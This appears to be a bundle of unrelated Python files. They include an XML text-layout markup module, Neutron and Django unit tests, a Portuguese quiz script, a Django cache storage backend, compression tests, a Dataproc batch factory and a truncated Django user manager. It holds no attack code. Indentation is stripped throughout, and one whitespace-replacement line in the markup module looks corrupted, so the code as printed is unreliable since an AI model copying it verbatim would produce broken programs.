g, b, a) tuple and returns the result.
Examples:
    >>> colorHashToRgba( '#ffffff' )
    RGBA(red=1.0, green=1.0, blue=1.0, alpha=1.0)
    >>> colorHashToRgba( '#ff000000' )
    RGBA(red=1.0, green=0.0, blue=0.0, alpha=0.0)
"""
colorHash = colorHash[1:]
if len(colorHash) == 6:
# It's a RGB hash.
alphaHex = "FF"
elif len(colorHash) == 8:
# It's a RGBA hash.
alphaHex = colorHash[6:8]
else:
raise ValueError("Can't parse color hash for '#%s'" % colorHash)
redHex = colorHash[0:2]
greenHex = colorHash[2:4]
blueHex = colorHash[4:6]
red = float(int(redHex, 16))
green = float(int(greenHex, 16))
blue = float(int(blueHex, 16))
alpha = float(int(alphaHex, 16))
return RGBA(red / 255.0, green / 255.0, blue / 255.0, alpha / 255.0)
def stringToBool(string):
"""
Converts a string with the contents 'true' or 'false' to the
appropriate boolean value.
Examples:
>>> stringToBool( 'true' )
True
>>> stringToBool( 'false' )
False
>>> stringToBool( 'True' )
Traceback (most recent call last):
...
ValueError: can't convert to boolean: True
"""
if string == "true":
return True
elif string == "false":
return False
else:
raise ValueError("can't convert to boolean: %s" % string)
# ----------------------------------------------------------------------------
# Style Properties
# ----------------------------------------------------------------------------
# Style properties that are inherited from a parent element to a child
# element.
STYLE_INHERITED_PROPERTIES = [
# The following properties are identical to the CSS properties of
# the same name, with the exception that any underscores should be
# replaced by hyphens.
"width",
"text_align",
"line_height",
"color",
"font_style",
"font_family",
"font_size",
# This property defines the maximum number of lines that the
# element can contain, and is only valid for Block elements; if
# the element's lines exceed this number and the 'ellipsify'
# property is false, a textlayout.MaxLinesExceededError is raised.
"max_lines",
# This property defines whether or not to truncate a Block element
# with an ellipsis ('...') if the Block's number of lines exceeds
# that prescribed by the "max_lines" property.
"ellipsify"
]
# Style properties that are not inherited from a parent element to a
# child element.
STYLE_UNINHERITED_PROPERTIES = [
# The following properties are identical to the CSS properties of
# the same name, with the exception that any underscores should be
# replaced by hyphens.
"margin_top",
"margin_bottom"
]
# All possibilities of styles defined by this module.
STYLE_PROPERTIES = (
STYLE_INHERITED_PROPERTIES +
STYLE_UNINHERITED_PROPERTIES
)
# ----------------------------------------------------------------------------
# Style Registry
# ----------------------------------------------------------------------------
class StyleRegistry(object):
"""
Registry of styles used by XML text layout markup. Note that this
class is not a singleton; rather, one StyleRegistry instance
exists for each document that the client wants to layout.
"""
def __init__(self):
"""
Creates an empty StyleRegistry object.
"""
self._styleDict = {}
def __validateKeys(self, style_dict):
"""
Makes sure that the keys of dict are the names of valid style
properties.
"""
invalidKeys = [key for key in style_dict.keys()
if key not in STYLE_PROPERTIES]
if len(invalidKeys) > 0:
raise InvalidPropertyError(str(invalidKeys))
def add(self, selector, **properties):
"""
Adds the given style selector with the given properties to the
style registry. If any of the properties are invalid, an
InvalidPropertyError is thrown.
Examples:
>>> styles = StyleRegistry()
>>> styles.add( 'document', width = '1000pt' )
>>> styles.add( 'p', foo = '1000pt' )
Traceback (most recent call last):
...
InvalidPropertyError: ['foo']
It should also be noted that the same style selector can't be
defined more than once, e.g.:
>>> styles.add( 'foo', width = '1000pt' )
>>> styles.add( 'foo', width = '1000pt' )
Traceback (most recent call last):
...
ValueError: Style 'foo' already exists.
"""
if selector in self._styleDict:
raise ValueError("Style '%s' already exists." % selector)
self.__validateKeys(properties)
self._styleDict[selector] = properties
def findMatch(self, selector):
"""
Given a selector, returns the style dictionary corresponding
to it. If no match is found, this method returns None.
Each key of the returned style dictionary corresponds to a
style property, while each value corresponds to the value of
the style property.
Examples:
>>> styles = StyleRegistry()
>>> styles.add( 'document', width = '1000pt' )
>>> styles.findMatch( 'document' )
{'width': '1000pt'}
>>> styles.findMatch( 'mystyle' ) == None
True
"""
return self._styleDict.get(selector, None)
def update(self, selector, **properties):
"""
Updates the styles for selector to those described by
properties.
Examples:
>>> styles = StyleRegistry()
>>> styles.add( 'document', width = '1000pt' )
>>> styles.update( 'document', margin_top = '24pt' )
>>> styles.findMatch( 'document' )
{'width': '1000pt', 'margin_top': '24pt'}
"""
assert selector in self._styleDict
self.__validateKeys(properties)
self._styleDict[selector].update(properties)
class InvalidPropertyError(Exception):
"""
Exception raised by the StyleRegistry when a style with invalid
properties is added to the registry.
"""
pass
# ----------------------------------------------------------------------------
# Cascading Style Stack
# ----------------------------------------------------------------------------
class CascadingStyleStack(object):
"""
Encapsulates the CSS-like 'cascading' style mechanism supported by
the XML text layout markup.
"""
# This is just a set version of STYLE_UNINHERITED_PROPERTIES.
uninheritedProps = set(STYLE_UNINHERITED_PROPERTIES)
def __init__(self):
"""
Creates an empty stack.
"""
self.__stack = []
def push(self, newStyle):
"""
Push a new style onto the Cascading Style Stack, making it the
current style.
"""
if len(self.__stack) > 0:
# "Cascade" the new style by combining it with our current
# style, removing any uninherited properties first.
currStyle = self.__stack[-1].copy()
props = self.uninheritedProps.intersection(currStyle.keys())
for key in props:
del currStyle[key]
currStyle.update(newStyle)
self.__stack.append(currStyle)
else:
# Set this style as our current style.
self.__stack.append(newStyle)
def pop(self):
"""
Remove the current style from the Cascading Style Stack.
"""
self.__stack.pop()
def _strToPoints(self, unitsStr):
"""
Converts from a string such as '1em', '2pt', '3in', '5pc', or
'20px' into a floating-point value measured in points.
"""
if unitsStr.endswith("em"):
currEmSizeStr = self.__stack[-1]["font_size"]
currEmSize = self._strToPoints(currEmSizeStr)
units = float(unitsStr[:-2])
return units * currEmSize
else:
return measurement.strToPoints(unitsStr)
def _propertyToPoints(self, propertyName):
"""
Converts the value of the given property name into a
floating-point value measured in points.
"""
propertyStr = self.__stack[-1][propertyName]
return self._strToPoints(propertyStr)
def _propertyToInt(self, propertyName):
"""
Converts the value of the given property name into an integer
value.
"""
return int(self.__stack[-1][propertyName])
def _propertyToBool(self, propertyName):
"""
Converts the value of the given property name into a boolean
value.
"""
return stringToBool(self.__stack[-1][propertyName])
def _propertyToColor(self, propertyName):
"""
Converts the value of the given property name into a (r, g, b,
a) color tuple.
"""
return colorHashToRgba(self.__stack[-1][propertyName])
def _property(self, propertyName):
"""
Returns the value of the given property name as a string.
"""
return self.__stack[-1][propertyName]
def makeNewDocument(self):
"""
Makes a new document with the current style.
"""
document = textlayout.Document(
width=self._propertyToPoints("width"),
marginTop=self._propertyToPoints("margin_top"),
marginBottom=self._propertyToPoints("margin_bottom"),
)
return document
def makeNewBlock(self):
"""
Makes a new block with the current style.
"""
block = textlayout.Block(
width=self._propertyToPoints("width"),
lineHeight=self._propertyToPoints("line_height"),
marginTop=self._propertyToPoints("margin_top"),
marginBottom=self._propertyToPoints("margin_bottom"),
textAlign=self._property("text_align"),
maxLines=self._propertyToInt("max_lines"),
ellipsify=self._propertyToBool("ellipsify")
)
return block
def makeNewGlyphs(self, characters):
"""
Makes new glyphs with the current style.
"""
glyphs = []
fontObj = font.Font.get(
self._property("font_family"),
self._propertyToPoints("font_size"),
self._property("font_style") == "italic"
)
color = self._propertyToColor("color")
for char in characters:
fontGlyph = fontObj.getGlyph(char)
glyph = textlayout.Glyph(
fontGlyph,
color,
)
glyphs.append(glyph)
return glyphs
# ----------------------------------------------------------------------------
# XML Markup Tag Aliases
# ----------------------------------------------------------------------------
class XmlMarkupTagAliases(object):
"""
Implementation of XML markup tag aliases, a simple feature that
allows one tag name to be aliased as another tag name.
"""
def __init__(self):
"""
Creates an empty set of tag aliases.
"""
self._aliases = {}
def add(self, name, baseElement):
"""
Adds a tag alias; 'name' will now be an alias for
'baseElement'.
The following example sets up tag aliases for <p> and
<caption> tags:
>>> tagAliases = XmlMarkupTagAliases()
>>> tagAliases.add( 'p', baseElement = 'block' )
>>> tagAliases.add( 'caption', baseElement = 'block' )
        It should also be noted that the same tag alias can't be defined
        more than once, e.g.:
>>> tagAliases.add( 'foo', baseElement = 'inline' )
>>> tagAliases.add( 'foo', baseElement = 'block' )
Traceback (most recent call last):
...
ValueError: Tag alias 'foo' already exists.
"""
if name in self._aliases:
raise ValueError("Tag alias '%s' already exists." % name)
self._aliases[name] = baseElement
def get(self, name):
"""
Retrieves the tag that the given name is an alias for.
Example:
>>> tagAliases = XmlMarkupTagAliases()
>>> tagAliases.add( 'p', baseElement = 'block' )
>>> tagAliases.get( 'p' )
'block'
>>> tagAliases.get( 'caption' )
Traceback (most recent call last):
...
KeyError: 'caption'
"""
return self._aliases[name]
def has(self, name):
"""
Returns whether or not the given name is an alias for a tag.
Example:
>>> tagAliases = XmlMarkupTagAliases()
>>> tagAliases.add( 'p', baseElement = 'block' )
>>> tagAliases.has( 'p' )
True
>>> tagAliases.has( 'caption' )
False
"""
return name in self._aliases
# ----------------------------------------------------------------------------
# XML Markup Content Handler
# ----------------------------------------------------------------------------
class _XmlMarkupHandler(xml.sax.handler.ContentHandler):
"""
XML content handler for XML text layout markup.
"""
def __init__(self, styleRegistry, tagAliases=None):
"""
Initializes the content handler with the given style registry
and tag aliases.
"""
xml.sax.handler.ContentHandler.__init__(self)
self.styleRegistry = styleRegistry
if not tagAliases:
tagAliases = XmlMarkupTagAliases()
self.tagAliases = tagAliases
def startDocument(self):
"""
Called by the XML parser at the beginning of parsing the XML
document.
"""
self.style = CascadingStyleStack()
self.document = None
self.block = None
self.glyphs = None
def _pushStyle(self, name, attrs):
"""
Sets the current style to the style defined by the "style"
attribute of the given tag. If that style doesn't exist, we
use the style named by the tag.
"""
styleDict = None
styleAttr = attrs.get("style", None)
if styleAttr:
styleDict = self.styleRegistry.findMatch(styleAttr)
if styleDict is None:
styleDict = self.styleRegistry.findMatch(name)
if styleDict is None:
raise ValueError, "No style found for: %s, %s" % (
name,
str(styleAttr)
)
self.style.push(styleDict)
def startElement(self, name, attrs):
"""
Handles the beginning of an XML element.
"""
if name == "document":
self._pushStyle(name, attrs)
self.document = self.style.makeNewDocument()
elif name == "block":
if not self.document:
raise XmlMarkupUnexpectedElementError(
"Block element encountered outside of document element."
)
self._pushStyle(name, attrs)
self.block = self.style.makeNewBlock()
self.glyphs = []
elif name == "inline":
if not self.block:
raise XmlMarkupUnexpectedElementError(
"Inline element encountered outside of block element."
)
self._pushStyle(name, attrs)
elif self.tagAliases.has(name):
baseElement = self.tagAliases.get(name)
self.startElement(baseElement, {"style": name})
else:
raise XmlMarkupUnknownElementError(name)
def endElement(self, name):
"""
Handles the end of an XML element.
"""
if name == "document":
self.style.pop()
self.document.layout()
elif name == "block":
ellipsisGlyph = self.style.makeNewGlyphs(u"\u2026")[0]
self.block.setEllipsisGlyph(ellipsisGlyph)
self.style.pop()
self.block.addGlyphs(self.glyphs)
self.document.addBlock(self.block)
self.block = None
self.glyphs = None
elif name == "inline":
self.style.pop()
else:
baseElement = self.tagAliases.get(name)
self.endElement(baseElement)
def characters(self, content):
"""
Handles XML character data.
"""
        if self.glyphs is not None:
self.glyphs.extend(self.style.makeNewGlyphs(content))
else:
# Hopefully, the content is just whitespace...
content = content.strip()
if content:
raise XmlMarkupUnexpectedCharactersError(content)
class _LXmlMarkupHandler(object):
"""
XML content handler for XML text layout markup.
"""
def __init__(self, styleRegistry, tagAliases=None):
"""
Initializes the content handler with the given style registry
and tag aliases.
"""
self.styleRegistry = styleRegistry
if not tagAliases:
tagAliases = XmlMarkupTagAliases()
self.tagAliases = tagAliases
def _pushStyle(self, name, attrs):
"""
Sets the current style to the style defined by the "style"
attribute of the given tag. If that style doesn't exist, we
use the style named by the tag.
"""
styleDict = None
styleAttr = attrs.get("style", None)
if styleAttr:
styleDict = self.styleRegistry.findMatch(styleAttr)
if styleDict is None:
styleDict = self.styleRegistry.findMatch(name)
if styleDict is None:
raise ValueError, "No style found for: %s, %s" % (
name,
str(styleAttr)
)
self.style.push(styleDict)
def start(self, name, attrs):
"""
Handles the beginning of an XML element.
"""
if name == "document":
self.style = CascadingStyleStack()
self.document = None
self.block = None
self.glyphs = None
self._pushStyle(name, attrs)
self.document = self.style.makeNewDocument()
elif name == "block":
if not self.document:
raise XmlMarkupUnexpectedElementError(
"Block element encountered outside of document element."
)
self._pushStyle(name, attrs)
self.block = self.style.makeNewBlock()
self.glyphs = []
elif name == "inline":
if not self.block:
raise XmlMarkupUnexpectedElementError(
"Inline element encountered outside of block element."
)
self._pushStyle(name, attrs)
elif self.tagAliases.has(name):
baseElement = self.tagAliases.get(name)
self.start(baseElement, {"style": name})
else:
raise XmlMarkupUnknownElementError(name)
def end(self, name):
"""
Handles the end of an XML element.
"""
if name == "document":
self.style.pop()
self.document.layout()
elif name == "block":
ellipsisGlyph = self.style.makeNewGlyphs(u"\u2026")[0]
self.block.setEllipsisGlyph(ellipsisGlyph)
self.style.pop()
self.block.addGlyphs(self.glyphs)
self.document.addBlock(self.block)
self.block = None
self.glyphs = None
elif name == "inline":
self.style.pop()
else:
baseElement = self.tagAliases.get(name)
self.end(baseElement)
def data(self, content):
"""
Handles XML character data.
"""
        if self.glyphs is not None:
self.glyphs.extend(self.style.makeNewGlyphs(content))
else:
# Hopefully, the content is just whitespace...
content = content.strip()
if content:
raise XmlMarkupUnexpectedCharactersError(content)
def close(self):
        # TODO: Reset here to a clean slate?
pass
class XmlMarkupUnknownElementError(Exception):
"""
Exception raised when an unknown XML text layout markup element is
encountered.
"""
pass
class XmlMarkupUnexpectedElementError(Exception):
"""
Exception raised when a recognized, but unexpected XML text layout
markup element is encountered.
"""
pass
class XmlMarkupUnexpectedCharactersError(Exception):
"""
Exception raised when characters are encountered in XML text
layout in a place where they're not expected.
"""
pass
# ----------------------------------------------------------------------------
# XML Markup to Document Conversion
# ----------------------------------------------------------------------------
def _sax_xmlMarkupToDocument(text, styleRegistry, tagAliases=None):
"""
Converts the given XML text into a textlayout.Document object that
has been fully laid out and is ready for rendering, using the
given style registry and tag aliases.
"""
# Convert all occurrences of multiple contiguous whitespace
# characters to a single space character.
text = RE_REDUCESPACE.sub(" ", text)
# Convert all occurrences of the non-breaking space character
# entity reference into its unicode equivalent (the SAX XML parser
# doesn't recognize this one on its own, sadly).
text = text.replace(" ", NON_BREAKING_SPACE)
text = text.encode("ascii", "xmlcharrefreplace")
xmlMarkupHandler = _XmlMarkupHandler(styleRegistry, tagAliases)
try:
xml.sax.parseString(text, xmlMarkupHandler)
except SAXParseException as e:
logging.error("Error parsing XML: '%s'; %s", text, e)
raise
return xmlMarkupHandler.document
def _lxml_xmlMarkupToDocument(text, styleRegistry, tagAliases=None):
"""
Converts the given XML text into a textlayout.Document object that
has been fully laid out and is ready for rendering, using the
given style registry and tag aliases.
"""
# Convert all occurrences of multiple contiguous whitespace
# characters to a single space character.
text = RE_REDUCESPACE.sub(" ", text)
# Convert all occurrences of the non-breaking space character
# entity reference into its unicode equivalent (the SAX XML parser
# doesn't recognize this one on its own, sadly).
text = text.replace(" ", NON_BREAKING_SPACE)
text = text.encode("ascii", "xmlcharrefreplace")
# TODO: Cache this?
handler = _LXmlMarkupHandler(styleRegistry, tagAliases)
parser = etree.XMLParser(
strip_cdata=False, resolve_entities=False, remove_blank_text=False,
huge_tree=False, target=handler
)
etree.fromstring(text, parser)
return handler.document
# lxml parser is preferred for its speed
xmlMarkupToDocument = _lxml_xmlMarkupToDocument if LXML_AVAILABLE \
else _sax_xmlMarkupToDocument
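# Minimal usage sketch (not from the original module; the selector names, style
# values and markup below are assumptions chosen to cover the properties read by
# makeNewDocument/makeNewBlock/makeNewGlyphs above):
#
#   styles = StyleRegistry()
#   styles.add("document", width="450pt", margin_top="0pt", margin_bottom="0pt",
#              line_height="14pt", text_align="left", max_lines="10",
#              ellipsify="true", color="#ffffffff", font_style="normal",
#              font_family="Helvetica", font_size="12pt")
#   styles.add("p", margin_top="6pt", margin_bottom="6pt")
#   aliases = XmlMarkupTagAliases()
#   aliases.add("p", baseElement="block")
#   doc = xmlMarkupToDocument(u"<document><p>Hello, world.</p></document>",
#                             styles, aliases)
#   # `doc` is a textlayout.Document that has already been laid out.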
|
# Copyright 2014, Doug Wiegley (dougwig), A10 Networks
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from nose.plugins.attrib import attr
from a10_neutron_lbaas.tests.unit import test_base
from a10_neutron_lbaas.plumbing import portbinding_vlan
from neutron.db.models.segment import NetworkSegment
from neutron.db.models_v2 import Port
from neutron.plugins.ml2.models import PortBindingLevel
_SUBNET_ID = "mysubnet"
_PORT_ID = "portid"
_SEGMENT_ID = "mysegment"
_VLAN_ID = 2000
_NETWORK_ID = "mynetwork"
_LEVEL = 1
def raise_(exc):
raise exc
class FakeModel(object):
def __init__(self, **kwargs):
self._dict = kwargs
def __getattr__(self, key):
return self._dict.get(key) or raise_(KeyError(key))
class FakeSession(object):
_model_map = {
PortBindingLevel: FakeModel(segment_id=_SEGMENT_ID, level=_LEVEL),
NetworkSegment: FakeModel(id=_SEGMENT_ID, segmentation_id=_VLAN_ID),
Port: FakeModel(id=_PORT_ID, subnet_id=_SUBNET_ID, network_id=_NETWORK_ID),
}
def __init__(self, *args, **kwargs):
pass
def query(self, model):
self._rval = self._model_map[model]
return self
def filter_by(self, *args, **kwargs):
return self
def first(self):
return self._rval
class FakeConfig(object):
def __init__(self, *args, **kwargs):
self._dict = kwargs
def get(self, key):
return self._dict.get(key)
@attr(db=True)
class TestVlanPortBindingPlumbing(test_base.UnitTestBase):
version = "v2"
def setUp(self, *args, **kwargs):
super(TestVlanPortBindingPlumbing, self).setUp(*args, **kwargs)
self._subnet_id = "mysubnet"
self._port_id = "portid"
self._segment_id = "mysegment"
self._vlan_id = 2000
self._network_id = "mynetwork"
self._level = 1
self._binding_level = mock.Mock(level=1, segment_id=self._segment_id)
self._segment = mock.Mock(id=self._segment_id, segmentation_id=self._vlan_id)
self._build_mocks()
self.target = portbinding_vlan.VlanPortBindingPlumbingHooks(self._driver, self._devices)
def test_select_device(self):
a = self.target.select_device("first-token")
self.target.select_device("second-token")
self.assertEqual(a, self.target.select_device("first-token"))
def test_after_vip_create(self):
self.target.after_vip_create(self.a10_context, self.os_context, self._vip)
self._client.vlan.create.assert_called_once_with(_VLAN_ID, mock.ANY, mock.ANY)
def test_after_vip_create_ve_exists(self):
self._client.interface.ve.get.return_value = {"ve": 2}
self.target.after_vip_create(self.a10_context, self.os_context, self._vip)
self._client.vlan.create.assert_not_called()
def _build_mocks(self):
# a10_context dependencies
self._vip = FakeModel(vip_subnet_id="mysubnet",
vip_port=FakeModel(id=self._port_id, network_id=self._network_id))
self._devices = {"a": {"host": "1.2.3.4", "api_version": "3.0"}}
self._driver = mock.Mock()
self._client = self._build_client()
self._config = FakeConfig(
use_database=False,
vlan_interfaces={
"tagged_trunks": [1, 2],
},
use_dhcp=False,
vlan_binding_level=self._level
)
self._a10_driver = mock.Mock(config=self._config)
self.a10_context = mock.Mock(a10_driver=self._a10_driver, client=self._client)
self._session = self._build_session()
self.os_context = mock.Mock(session=self._session, tenant_id="tenant")
def _build_session(self, **kwargs):
return FakeSession()
def _build_client(self):
rval = mock.Mock()
rval.interface.ve.get_oper.return_value = None
rval.interface.ve.get = lambda: {}
return rval
|
from django.contrib.auth.models import User
from django.test import TestCase
from django.urls import resolve, reverse
from ..models import Board, Post, Topic
from ..views import PostListView
class TopicPostsTests(TestCase):
def setUp(self):
self.board = Board.objects.create(name='Django', description='Django board.')
self.user = User.objects.create_user(username='john', email='[email protected]', password='123')
self.topic = Topic.objects.create(subject='Hello, world', board=self.board, starter=self.user)
Post.objects.create(message='Lorem ipsum dolor sit amet', topic=self.topic, created_by=self.user)
self.url = reverse('topic_posts', kwargs={'pk': self.board.pk, 'topic_pk': self.topic.pk})
self.response = self.client.get(self.url)
def test_status_code(self):
        self.assertEqual(self.response.status_code, 200)
def test_view_function(self):
view = resolve('/boards/1/topics/1/')
        self.assertEqual(view.func.view_class, PostListView)
|
# Django imports
from django.urls import path
# About app imports
from about.views.about_view import about
app_name = 'about'
urlpatterns = [
path(
route='',
view=about,
name='about'
),
]
|
perguntas = {
'Pergunta1':{
'pergunta':'Quanto é 2 + 2?',
'respostas': {'a':2,'b':22,'c':4},
'resposta_certa':'c'
},
'Pergunta2':{
'pergunta':'Quanto é 2 - 2?',
'respostas': {'a':2,'b':0,'c':4},
'resposta_certa':'b'
}
}
acertos = 0
for pk,pv in perguntas.items():
print(f'{pk} {pv["pergunta"]}')
for rk,rv in pv["respostas"].items():
print(f'{rk} {rv}')
print()
resp_user = input('Digite a sua resposta')
if resp_user == pv["resposta_certa"]:
print("Voce acertou!!!")
acertos += 1
else:
print("Voce errou!!")
qtd_perguntas = len(perguntas)
porcento = (acertos/qtd_perguntas)*100
print(f'Voce acertou {acertos} perguntas e teve um percentual de {porcento} perguntas acertadas')
|
# coding=utf-8
from __future__ import absolute_import, division, print_function, \
unicode_literals
from typing import Optional, Text, Tuple, Union
from django.core.cache import BaseCache, DEFAULT_CACHE_ALIAS
from django.core.cache.backends.base import DEFAULT_TIMEOUT
from triggers.locking import resolve_cache
from triggers.storages.base import BaseTriggerStorage
__all__ = [
'CacheStorageBackend',
]
class CacheStorageBackend(BaseTriggerStorage):
"""
Uses the Django cache as a storage backend for TriggerManager.
"""
def __init__(self, uid, cache=DEFAULT_CACHE_ALIAS, timeout=DEFAULT_TIMEOUT):
# type: (Text, Union[BaseCache, Text], Optional[int]) -> None
"""
:param uid:
Session UID
:param cache:
The cache backend (or name thereof) to use.
:param timeout:
Timeout value to use when storing data to the cache.
Depending on which cache you are using (e.g., Redis),
setting ``timeout=None`` may store values permanently, or
it may use the cache's default timeout value.
"""
super(CacheStorageBackend, self).__init__(uid)
self.cache = resolve_cache(cache)
self.timeout = timeout
def close(self, **kwargs):
try:
self.cache.close(**kwargs)
except AttributeError:
pass
def _load_from_backend(self):
# type: () -> Tuple[dict, dict, dict]
cached = self.cache.get(self.cache_key) or {}
return (
cached.get('tasks') or {},
cached.get('instances') or {},
cached.get('metas') or {},
)
def _save(self):
self.cache.set(
self.cache_key,
{
'tasks': self._serialize(self._configs, True),
'instances': self._serialize(self._instances, True),
'metas': self._metas,
},
self.timeout,
)
@property
def cache_key(self):
# type: () -> Text
"""
Returns the key used to look up state info from the cache.
"""
return __name__ + ':' + self.uid
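# Minimal usage sketch (the uid, cache alias, and timeout values below are made up):
#   storage = CacheStorageBackend(uid='session-1234', cache='default', timeout=3600)
# Per the type annotation on __init__, ``cache`` may be either a cache alias or a
# BaseCache instance; resolve_cache() is expected to accept either form.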
|
"""
(c) 2021 Usman Ahmad https://github.com/selphaware
test_main.py
Testing mainly file compressions and some string compressions
"""
import unittest
from tests.tfuncs import string_test, compress_test # type: ignore
from os import remove
class TestHuffPress(unittest.TestCase):
def test_d_txt(self):
self.assertEqual(compress_test("../tests/files/d.txt"), True)
remove("../tests/files/d.txt.bak")
remove("../tests/files/d.txt.hac")
def test_i_txt(self):
self.assertEqual(compress_test("../tests/files/i.txt"), True)
remove("../tests/files/i.txt.bak")
remove("../tests/files/i.txt.hac")
def test_j_txt(self):
self.assertEqual(compress_test("../tests/files/j.txt"), True)
remove("../tests/files/j.txt.bak")
remove("../tests/files/j.txt.hac")
def test_u_exe(self):
self.assertEqual(compress_test("../tests/files/u.exe"), True)
remove("../tests/files/u.exe.bak")
remove("../tests/files/u.exe.hac")
def test_string1(self):
in_txt = "A_DEAD_DAD_CEDED_A_BAD_BABE_A_BEADED_ABACA_BED"
com_dat, decom_dat = string_test(in_txt)
self.assertEqual(com_dat, decom_dat)
def test_string2(self):
in_txt = "AABBCC"
com_dat, decom_dat = string_test(in_txt)
self.assertEqual(com_dat, decom_dat)
def test_string3(self):
in_txt = "AAA"
com_dat, decom_dat = string_test(in_txt)
self.assertEqual(com_dat, decom_dat)
def test_string4(self):
in_txt = "A"
com_dat, decom_dat = string_test(in_txt)
self.assertEqual(com_dat, decom_dat)
def test_string5(self):
in_txt = "!\"£$%^&*()_+{}:@~<>?,./;'#[]789654321/*-+\\`¬|"
com_dat, decom_dat = string_test(in_txt)
self.assertEqual(com_dat, decom_dat)
def test_string6(self):
in_txt = "AB"
com_dat, decom_dat = string_test(in_txt)
self.assertEqual(com_dat, decom_dat)
def test_string7(self):
in_txt = " A B C D E F G P "
com_dat, decom_dat = string_test(in_txt)
self.assertEqual(com_dat, decom_dat)
def test_string8(self):
in_txt = "A "
com_dat, decom_dat = string_test(in_txt)
self.assertEqual(com_dat, decom_dat)
|
from forsa import settings
from wajiha.models import OpportunityCategory
def google_keys(request):
return {'GOOGLE_ANALYTICS_KEY': settings.GOOGLE_ANALYTICS_KEY, 'GTM_KEY': settings.GTM_KEY}
def category_list(request):
    return {'category_search_list': OpportunityCategory.objects.all()}
|
# -*- coding: utf-8 -*-
from itertools import chain
from os import getcwd, path
import argparse
from pupy.decorations import tictoc
CD = getcwd()
def fmt_line(line, col, phillup=False):
"""
:param line:
:param col:
:return:
# >>> format_line([])
"""
if len(line) == 1:
code = line[0]
if phillup: return ''.join((code, ' ' * (1 + col - len(code)), '#$#'))
else: return code
if len(line) == 2:
code, comment = line
return ''.join((code, ' ' * (1 + col - len(code)), '#$#', comment))
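# Doctest-style examples for fmt_line (illustrative; output spacing depends on
# the chosen column):
#
#     >>> fmt_line(["x = 1", " a comment"], col=9)
#     'x = 1     #$# a comment'
#     >>> fmt_line(["x = 1"], col=9, phillup=True)
#     'x = 1     #$#'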
@tictoc()
def funk_docktor(unfunky, clusters=True, phillup=False):
"""Formats a multi-line string"""
if clusters:
pass
else:
lines = unfunky.replace('# $#', '#$#').split('\n')
furst = min(i for i, line in enumerate(lines)
if '#$#' in line)
last = max(i for i, line in enumerate(lines)
if '#$#' in line)
doc_lines = [line.split("#$#")
for line in lines[furst:last + 1]]
maxcodelength = max(len(line[0]) for line in doc_lines
if len(line) == 2)
lgne = [fmt_line(line,
col=maxcodelength,
phillup=phillup)
for line in doc_lines]
if phillup and doc_lines[-1][0] == '':
lgne[-1] = ''
return '\n'.join(chain.from_iterable((lines[:furst], lgne, lines[last + 1:])))
def main():
parser = argparse.ArgumentParser(description='~ ~ ~ Funk ~ DOCKTOR ~ ~ ~ ')
parser.add_argument('-p', '--phillup',
action="store_true",
dest='phillup',
default=False)
parser.add_argument('-i', '--inplace',
action="store_true",
dest='inplace',
default=False)
parser.add_argument('-f', '--file',
type=argparse.FileType('r'),
nargs='+')
args = parser.parse_args()
for file in args.file:
abs_fpath = path.join(CD, file.name)
fdir, fname = path.split(abs_fpath)
fname = fname.replace('.py', '.[FDOC].py')
with open(path.join(fdir, fname), 'w') as docktored:
docktored.write(funk_docktor(file.read(), clusters=False))
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*- #
# Copyright 2021 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Factory class for PySparkBatch message."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.command_lib.dataproc import flags
from googlecloudsdk.command_lib.dataproc import local_file_uploader
class PySparkBatchFactory(object):
"""Factory class for PySparkBatch message."""
def __init__(self, dataproc):
"""Factory class for SparkBatch message.
Args:
dataproc: A Dataproc instance.
"""
self.dataproc = dataproc
def UploadLocalFilesAndGetMessage(self, args):
"""upload user local files and creates a PySparkBatch message.
Upload user local files and point URIs to the local files to the uploaded
URIs.
Creates a PySparkBatch message from parsed arguments.
Args:
args: Parsed arguments.
Returns:
PySparkBatch: A PySparkBatch message.
Raises:
AttributeError: Bucket is required to upload local files, but not
specified.
"""
kwargs = {}
if args.args:
kwargs['args'] = args.args
dependencies = {}
# Upload requires a list.
dependencies['mainPythonFileUri'] = [args.MAIN_PYTHON_FILE]
if args.python_files:
dependencies['pythonFileUris'] = args.python_files
if args.py_files:
dependencies['pythonFileUris'] = args.py_files
if args.jar_files:
dependencies['jarFileUris'] = args.jar_files
if args.jars:
dependencies['jarFileUris'] = args.jars
if args.files:
dependencies['fileUris'] = args.files
if args.archives:
dependencies['archiveUris'] = args.archives
if local_file_uploader.HasLocalFiles(dependencies):
bucket = args.deps_bucket if args.deps_bucket is not None else args.bucket
if not bucket:
raise AttributeError('--deps-bucket was not specified.')
dependencies = local_file_uploader.Upload(bucket, dependencies)
# Move mainPythonFileUri out of the list.
dependencies['mainPythonFileUri'] = dependencies['mainPythonFileUri'][0]
# Merge the dict first for compatibility.
# Old python versions don't support multi unpacking of dictionaries.
kwargs.update(dependencies)
return self.dataproc.messages.PySparkBatch(**kwargs)
def AddArguments(parser):
"""Adds arguments related to PySparkBatch message."""
flags.AddMainPythonFile(parser)
flags.AddPythonFiles(parser)
flags.AddJarFiles(parser)
flags.AddOtherFiles(parser)
flags.AddArchives(parser)
flags.AddArgs(parser)
# Cloud Storage bucket to upload workload dependencies.
# It is required until we figure out a place to upload user files.
flags.AddBucket(parser)
|
from slither.core.visualization import render_map
from slither.service import Service
s = Service()
activities = s.list_activities()
a = [a for a in activities if a.has_path][0]
print(a.start_time)
map = render_map(a.get_path())
with open("map.html", "w") as f:
f.write(map)
|
from django.contrib.auth.base_user import BaseUserManager
from django.contrib.auth.models import AbstractUser
from django.db import models
class CustomUserManager(BaseUserManager):
def create_user(self, email, password, **extra_fields):
if not email:
raise ValueError('The Email must be set')
email = self.normalize_email(email)
